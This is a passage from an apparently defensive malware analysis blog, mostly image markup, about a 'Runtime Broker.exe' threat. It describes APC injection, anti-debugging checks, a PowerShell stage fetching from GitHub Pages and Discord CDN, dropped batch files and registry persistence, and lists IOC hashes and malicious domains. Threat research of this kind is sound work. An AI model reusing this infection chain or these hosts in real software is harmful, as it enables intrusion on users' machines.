    style=&quot;padding-bottom: 36.197916666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAABaElEQVR42lWO3U7bMACF88TTHoNnmHa3qyEkygYXncQAAZ1aoC2hKQltEtM4sWM3/onTxqRpjMeuJp2LTzr6dI4zGVx59wMY+aPB5WwyhPECw6fR48Hs6bM7/pQtezT1UBaXNJU05XliY0EQqArs/O4d3fZPV5H/MLx+mU8xCBYgOvPGcdiPRt/D+dFrcpugRFiBpixPbCxwAksr8wILjhVDlSSmrcxOVFQE3mqrpdFN12jT1manTFPatDXfa/HB0jTKwavlOosFSdLY1yWxBSDZr8WjzAOOQpanBQFrRbpadrXYVazdMAtdzTtdOgRGDL8yBHz3bsOx2Vcwz368uIvlGQSXKfQwRUxh8/eIsOZ+yywYzc1b6eQwLFDMUOzP7kHgqgJpFgXTr8/Bl9XyG0Xn+XrcbIoPwcrFfzLNgF2WJHEf/txc9Msi0yyJnn+C+BCGJzIbUnQs10OjlR1vt3y/5f9emDf1DhHZeITzIdlyAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;APC code injection tecnique&quot;
        title=&quot;&quot;
        src=&quot;/website/static/288ee5462d82cf00ca8e797cb3def066/c1bea/RuntimeBroker14.png&quot;
        srcset=&quot;/website/static/288ee5462d82cf00ca8e797cb3def066/804b2/RuntimeBroker14.png 384w,
/website/static/288ee5462d82cf00ca8e797cb3def066/e5715/RuntimeBroker14.png 768w,
/website/static/288ee5462d82cf00ca8e797cb3def066/c1bea/RuntimeBroker14.png 1388w&quot;
        sizes=&quot;(max-width: 1388px) 100vw, 1388px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;em&gt;APC code injection tecnique&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1390px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3436bce69dba5a14c92d5f76e17c7054/f1c64/RuntimeBroker15.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 22.135416666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA2klEQVR42i3GTW+CMAAAUP7/eYfttOOS3eZh2U7LlhjE4XQapYCAo19gW1qoSiWyjiwm7/Ac3xv7k488CZYzbxt8K0Zg9LlaPq43DzB5pwhg5CkGG0HlHklGFC9qTmqOdVU6C99dzdwSbteLaZ6CvqYvEX6eP8HoNgxugvheSWwUO6nyUNHBkH9F2zCnwJlkqBEYZ6DIY9vyrx1zI//Ip3L/StGdaULbHey5vrSyb+WQq047MA0ZSgRJ8Q50mvVGiWy+iUc/+E0TYLj67bQ1lTXychT9SQy5Otd/BFPWaVOj/6MAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;APC code injection tecnique&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3436bce69dba5a14c92d5f76e17c7054/f1c64/RuntimeBroker15.png&quot;
        srcset=&quot;/website/static/3436bce69dba5a14c92d5f76e17c7054/804b2/RuntimeBroker15.png 384w,
/website/static/3436bce69dba5a14c92d5f76e17c7054/e5715/RuntimeBroker15.png 768w,
/website/static/3436bce69dba5a14c92d5f76e17c7054/f1c64/RuntimeBroker15.png 1390w&quot;
        sizes=&quot;(max-width: 1390px) 100vw, 1390px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1384px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/26028a854034ac624094d0605722800e/0e904/RuntimeBroker16.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 14.84375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAABYlAAAWJQFJUiTwAAAAqUlEQVR42h3I0Q6CIACFYd//WbpordXWXNdttVXLMjWj0AoQUAJMpCLW9l385wS79TLdrxtSVHega9Q2uFf0FC9qXHSCmYb0Clh9tjo3sjSSvQTxjKS94sF4OAinoyI/ZvEWpFEJEk6KaDMByeFxhRTmHM8FDSWfcbxiqKzuF48hWJNbQB5QMNQ+K1kj57rvWzkr4Tl7aea+2reznbPG9cbZ1s+PEd7/Vz+7/aQakgL3+AAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Debugger1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/26028a854034ac624094d0605722800e/0e904/RuntimeBroker16.png&quot;
        srcset=&quot;/website/static/26028a854034ac624094d0605722800e/804b2/RuntimeBroker16.png 384w,
/website/static/26028a854034ac624094d0605722800e/e5715/RuntimeBroker16.png 768w,
/website/static/26028a854034ac624094d0605722800e/0e904/RuntimeBroker16.png 1384w&quot;
        sizes=&quot;(max-width: 1384px) 100vw, 1384px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;em&gt;Migrant from 32 to 64 bit&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Several anti-debugging techniques were also found. The first one is based on a function called &lt;em&gt;GetTickCount()&lt;/em&gt;: it counts the seconds between 2 points inside the binary execution and if the time is too high the program is running in a debugger and the original behavior is modified:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1390px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/df9e0968b4170bf1d5da24adcecc36d5/f1c64/RuntimeBroker17.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 21.875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA3ElEQVR42i3L70+CQADGcf7/P6LaLFdL19Yr39BWL3Qxp4EFRwqCJ/eL445OBMTcdTm3z4tn3+2x7OehO3ldAQ8sZhhGjSDjePECHiG8ydEDQ2+SLQX1VYHKPDNUgc/QTlJrYo++Pxy0Br7rxKHXSOZv3sefvWV4S+KnbXKXrq9oZteSVAIbdUnPSKNyK4kCJTDP4sB1cBLqruJwOnevA9BP/XuS9nM6aveF6b+1ODVSH34uup0VAa+kkMGVoBt9qkziyPsKe5wNOBl0+60+HnUrdVv+n2thxsVB/QEoZtSYAZDMSwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Debugger2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/df9e0968b4170bf1d5da24adcecc36d5/f1c64/RuntimeBroker17.png&quot;
        srcset=&quot;/website/static/df9e0968b4170bf1d5da24adcecc36d5/804b2/RuntimeBroker17.png 384w,
/website/static/df9e0968b4170bf1d5da24adcecc36d5/e5715/RuntimeBroker17.png 768w,
/website/static/df9e0968b4170bf1d5da24adcecc36d5/f1c64/RuntimeBroker17.png 1390w&quot;
        sizes=&quot;(max-width: 1390px) 100vw, 1390px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Another API call used in the binary is the &lt;em&gt;IsDebuggerPresent()&lt;/em&gt;, a function used to know if the binary is running in a debugger environment. If true, the original behavior is modified:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1322px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/b057e5c9f74c217b50b54ce75cba0955/203d3/RuntimeBroker18.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 19.53125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA+0lEQVR42hXC206CYAAAYF61B+gVuqqrbrqwra2Ltm5aq62j5aoplSITAwE5CgoI6M/hB1SOv0nr24ctHMP3bJTFwNZFllL4nwhYm2hpTwRdYURZ1njD1N2ZZNHaNa031qFUl1WNsm0eY73WU+f+xpkpqjjqdt7w9xeRG5aJN9bkV0YaEHOFARILabpJ6sf96WEKm/kKX0djCBzs4/bq4eJ8KrHCaEARn2S3LXJUGgJa/77kz0h6/6u/p3KngduD/qO/bCXBcxLexf7Qd+cYWFiB55RpFALTmAiuqVY5rHcZ7pknBlGsjgL/AAaNHdrU1W+NqrpC/1GxLaI/Zt/L9QKdSigAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Debugger2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b057e5c9f74c217b50b54ce75cba0955/203d3/RuntimeBroker18.png&quot;
        srcset=&quot;/website/static/b057e5c9f74c217b50b54ce75cba0955/804b2/RuntimeBroker18.png 384w,
/website/static/b057e5c9f74c217b50b54ce75cba0955/e5715/RuntimeBroker18.png 768w,
/website/static/b057e5c9f74c217b50b54ce75cba0955/203d3/RuntimeBroker18.png 1322w&quot;
        sizes=&quot;(max-width: 1322px) 100vw, 1322px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;3. IOCs - Indicator of Compromises &lt;a id=&quot;3-iocs-indicator-of-compromises&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;IOC&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;sha256&lt;/td&gt;
&lt;td&gt;8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;md5&lt;/td&gt;
&lt;td&gt;730f84805b3b815bf5f11b4ef0e60ee2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;url&lt;/td&gt;
&lt;td&gt;eldi8.github.io&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;url&lt;/td&gt;
&lt;td&gt;wjecpujpanmwm.tk&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;url&lt;/td&gt;
&lt;td&gt;vimeo.com&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;url&lt;/td&gt;
&lt;td&gt;evinfeoptasw.dedyn.io&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;url&lt;/td&gt;
&lt;td&gt;cdn.discordapp.com&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;url&lt;/td&gt;
&lt;td&gt;bobsmith.apiworld.cf&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;url&lt;/td&gt;
&lt;td&gt;cdn.goodfilehosting.it&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/br&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/br&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;4. Variants &lt;a id=&quot;4-variants&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;h3&gt;4.1 Variant v.3 (july 11th 2023) &lt;a id=&quot;Variant-v.3&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We observed some variants during last year, here we attach the differences between the behavior described above and the new versions of the malware:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Powershell &lt;strong&gt;explorer.ps1&lt;/strong&gt; script loads and requests obfuscated binary data from &lt;strong&gt;eldi8.github.io/src.txt&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;It then, converts the spaces tabs to 1 and 0 and new-lines to &lt;spaces&gt; to get the .tk domain&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;then the powershell script makes the request to .tk domain with from=USB&amp;#x26;user=&lt;GUID&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In return, the .tk responds with Dropzone URL for Runtime Broker.exe which in this case is the Discord CDN&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;the &lt;strong&gt;Runtime Broker.exe&lt;/strong&gt; create a random Temp folder and save inside command.bat and execute.bat&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;execute &lt;em&gt;execute.bat&lt;/em&gt; saved in the previous folder&lt;/li&gt;
&lt;li&gt;delete the random temp folder&lt;/li&gt;
&lt;li&gt;run &lt;em&gt;net session&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;create the persistence via reg.exe&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1390px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f2b852be6e489e79d664b111bf559217/f1c64/RuntimeBroker19.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.541666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAABYlAAAWJQFJUiTwAAABCElEQVR42j2RDbLDIAiEvf+tmviLmkRjk/Y278N03o7DILC4oCml1FqPY9+2bZ/IOYvkB4KHLxpJEzIRFcGEkGrde+9wex/7fljrQyCXlsWt1h9H6/2kQF/ZeEMPPsec56ilwtkP0Mhjx3gToai19vl87vu+rvtxvl+1gJTxPk5J4lzA4YoWrq/XKrkgwVonKVtHVNbVYWOUZbHeBwMnl4rIlJixQM5Sni48/uslgkUnNXAos6tXMlFWJVLgk57VqoXJZ6+QYmIu1aXMiEMZcliMoZnKluxUWPYuQE5RnPVEVMhPlzwb4XdQNBdWDO3Jweei80z1McQyB9ZGkrGs57re/xhjtNb+AB3LfTfEDhO4AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pyton&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f2b852be6e489e79d664b111bf559217/f1c64/RuntimeBroker19.png&quot;
        srcset=&quot;/website/static/f2b852be6e489e79d664b111bf559217/804b2/RuntimeBroker19.png 384w,
/website/static/f2b852be6e489e79d664b111bf559217/e5715/RuntimeBroker19.png 768w,
/website/static/f2b852be6e489e79d664b111bf559217/f1c64/RuntimeBroker19.png 1390w&quot;
        sizes=&quot;(max-width: 1390px) 100vw, 1390px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The &lt;em&gt;wjecpujpanmwm.tk&lt;/em&gt; domain is offline due to the expired DNS registration, so we probably will see a new version with new domains and features.&lt;/p&gt;
&lt;p&gt;Here’s resumed, the changes from the previous version:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Using Discord domain instead of Vimeo to download the Runtime Broker.exe&lt;/li&gt;
&lt;li&gt;The eldi8.github.io isn’t offline and is currently used to obfuscate the first stage&lt;/li&gt;
&lt;li&gt;Two scripts command.bat and execute.bat are currently created&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1434px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6e4768a329e110c6f825d3867944934b/c65fa/RuntimeBroker20.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.854166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAkElEQVR42sWQ3QrDMAiF8/7vOFjZmnTsItgmml87k5TtorvY3T5EjuIRVE328vTzw931el22WxMw6UV35oExZtQipBwaEdVKEAtR9hAsJkcZtwAePRHhCS84H2OstTKz2hvc44A7+w+oc+uvZuecHJY/pJzSOwvWWnnKdzMAiL+9iHAsYq6lFokquWQZCCG8AJexmPNtG5s4AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Discord&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6e4768a329e110c6f825d3867944934b/c65fa/RuntimeBroker20.png&quot;
        srcset=&quot;/website/static/6e4768a329e110c6f825d3867944934b/804b2/RuntimeBroker20.png 384w,
/website/static/6e4768a329e110c6f825d3867944934b/e5715/RuntimeBroker20.png 768w,
/website/static/6e4768a329e110c6f825d3867944934b/c65fa/RuntimeBroker20.png 1434w&quot;
        sizes=&quot;(max-width: 1434px) 100vw, 1434px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1404px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/36ce085523b3b9db1224602a689297c8/f793b/RuntimeBroker21.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.07291666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAABC0lEQVR42j2Q227CMBBE/f/fVakN4gFVFKiggqTQRjR324lvu+44KbWONrPjiZ2NuFd1Kw3H6ImqqrbeU4wuhO+ynIyNMRJH5lSTiAmIwAxEd9l0xdaUB6pPff5qy0NsPkJ1bM4bed3qr/2Y2M11r287eU3a39+5K4Q6Pk3nzOVZvK1dsQqfKwi+rm2+MpcXc8lsnnCJ5IznZ5iE2P1N9M0P0EMb7Ci7elI9ewMNcwBtBVTfYGtJ9m015xvEhJ4mH4gw1mO8Zc1DciCmv4F5bgm/ZtHICKl0PwxKjzCkUsaY9CYRzISUMKVWeKIdpARd2pLee4HGWOcD7mDn00csB0M751GX5R78ayL6BYJTjenAJ0hMAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Discord2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/36ce085523b3b9db1224602a689297c8/f793b/RuntimeBroker21.png&quot;
        srcset=&quot;/website/static/36ce085523b3b9db1224602a689297c8/804b2/RuntimeBroker21.png 384w,
/website/static/36ce085523b3b9db1224602a689297c8/e5715/RuntimeBroker21.png 768w,
/website/static/36ce085523b3b9db1224602a689297c8/f793b/RuntimeBroker21.png 1404w&quot;
        sizes=&quot;(max-width: 1404px) 100vw, 1404px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1388px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f64423350316d207b5e467dc52db3eb6/c1bea/RuntimeBroker22.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 72.39583333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABYlAAAWJQFJUiTwAAABwUlEQVR42jWS6XKDMAyEIYVw2NicxkD/NJPm6kze//H6yWqVGY1QpNVqrew4DufcMAzGmHOysizx1bnSoCiKPM9Pp5P4/KRxlmWXyyVblsV7v20bwTiOAIFS17XtOmtMyw/fttZayTdN07Zd11Hwer2yNUY+lmXG+mRgkdHIdR098FJ2QABEJs+z7+9bNs8L0DHGaZr4O9VLAxDUOe+koWmMTG7rqmILdoL29XqVyUp7XmaXjGba6mRV/WfGmqYVzhCnAC3u97vsDOg8T0pYrU1Gvk3VWFVVtOIBIll8fEgzk533n8cByhr5iiEElAvrSkByGIe+H5jm+54VCGAH+TQ5BFKqlmybJBF4Y5oG3gxsKNB1TDLnPK/4fD6zGDc+mLiI4tOQyFONeMBpjwbkAWKTztqyKB6PBzsHa/4m8zdFdIoqttMXNkbGQh6v+pHlVG63Wxa3jSHbvmu/TSZHktZrU78Qxjun16KKvn5+/o9EpGH9ENbAg4tgSS1iSrkFMoLu+2EcGcYNy4XR4ns/TvpUDidXAVcWK8t0EmLy5lV1/jeORGh/XS77vqtXkYBPz5FuDZJJKv1Lr2AYRkR5v9+/MpMwXChbtxkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Discord&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f64423350316d207b5e467dc52db3eb6/c1bea/RuntimeBroker22.png&quot;
        srcset=&quot;/website/static/f64423350316d207b5e467dc52db3eb6/804b2/RuntimeBroker22.png 384w,
/website/static/f64423350316d207b5e467dc52db3eb6/e5715/RuntimeBroker22.png 768w,
/website/static/f64423350316d207b5e467dc52db3eb6/c1bea/RuntimeBroker22.png 1388w&quot;
        sizes=&quot;(max-width: 1388px) 100vw, 1388px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;the execute.bat&lt;/strong&gt;
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1398px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3525a41319f3b819380f1c627547dc48/82c1e/RuntimeBroker23.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA4UlEQVR42k2QCY6DQAwE+f9jogSFIzD3CeJTKZvd1VrD0O623RoP87xs214kMueOop8w+Sb1u4sUxRRrrYP3sZSaoFKpEq33zg1JFXnOFdxa0xEwwA5zHMewfvYQorXeOe+s9z5ExsYkKThEQCRPMEHVTAborQ9QCMZYY5000BEiM6xx+w7lkawMjaTGONq0zJ3nSbPnzcvyWdeNuiQPKCkX3EKQRF1lAwwFi5oy57quYZrmcZwej9fzOb7fi1V/xuOMD567WEMGtRGMCicLaxr1N3SjP7/87/5btcpsMffev01APFnKBoh5AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ExecuteBat&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3525a41319f3b819380f1c627547dc48/82c1e/RuntimeBroker23.png&quot;
        srcset=&quot;/website/static/3525a41319f3b819380f1c627547dc48/804b2/RuntimeBroker23.png 384w,
/website/static/3525a41319f3b819380f1c627547dc48/e5715/RuntimeBroker23.png 768w,
/website/static/3525a41319f3b819380f1c627547dc48/82c1e/RuntimeBroker23.png 1398w&quot;
        sizes=&quot;(max-width: 1398px) 100vw, 1398px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;the command.bat&lt;/strong&gt;
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1390px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f7c40b5053d01ed85e51033af2ba20c9/f1c64/RuntimeBroker24.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 18.229166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAnUlEQVR42l2PiQ6DIAyGef/3MfPg9ogTYSpoBPcw+3XZsuyjNH/L0ZYIIaVUxhjn3DQ9vjist3DOWuvs5X/AEWnbvq7b+2DmefHeL4sPIXgftm0L6xrCmlJ6XhzHkT7EGJEhTdNJqauKZ1me36qioGXJGBXI0NOzruuHYYSh2L7v8QICfxGtazzm/LzHuIBAqJTGLAKGrbQ5GcFf2y96F76KDdZZPQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CommandBat&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f7c40b5053d01ed85e51033af2ba20c9/f1c64/RuntimeBroker24.png&quot;
